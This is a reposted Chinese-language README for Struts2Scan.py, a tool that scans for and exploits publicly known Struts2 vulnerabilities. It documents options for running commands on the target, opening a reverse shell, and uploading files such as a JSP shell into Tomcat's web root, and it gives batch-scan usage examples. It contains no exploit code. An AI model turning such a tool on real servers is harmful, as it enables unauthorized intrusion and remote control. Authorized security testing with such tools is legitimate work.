Struts2漏洞掃描[工具


Struts2漏洞利用掃描工具,基於互聯網上已經公開的Structs2高危漏洞exp的掃描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057

d788bc2d3dd64a8cb439f98e7ce7f15f.png

支持單個URL漏洞檢測和批量URL檢測,至此指定漏洞利用,可獲取WEB路徑,執行命令,反彈shell和上傳文件,注意,並不是所有的漏洞均支持上述功能,只有部分功能支持

工具參數說明

Usage: Struts2Scan.py [OPTIONS]

Struts2批量掃描利用工具

Options:

-i, --info 漏洞信息介紹

-v, --version 顯示工具版本

-u, --url TEXT URL地址

-n, --name TEXT 指定漏洞名稱, 漏洞名稱詳見info

-f, --file TEXT 批量掃描URL文件, 一行一個URL

-d, --data TEXT POST參數, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}

-c, --encode TEXT 頁面編碼, 默認UTF-8編碼

-p, --proxy TEXT HTTP代理. 格式為http://ip:por

-t, --timeout TEXT HTTP超時時間, 默認10s

-w, --workers TEXT 批量掃描進程數, 默認為10個進程

--header TEXT HTTP請求頭, 格式為: key1=value1&key2=value2

-e, --exec 進入命令執行shell

--webpath 獲取WEB路徑

-r, --reverse TEXT 反彈shell地址, 格式為ip:port

--upfile TEXT 需要上傳的文件路徑和名稱

--uppath TEXT 上傳的目錄和名稱, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp

-q, --quiet 關閉打印不存在漏洞的輸出,只保留存在漏洞的輸出

-h, --help Show this message and exit.

批量漏洞檢測:

$ python3 Struts2Scan.py -f urls.txt

POST數據:

$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action-d name=admin&email=admin&age={exp}


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM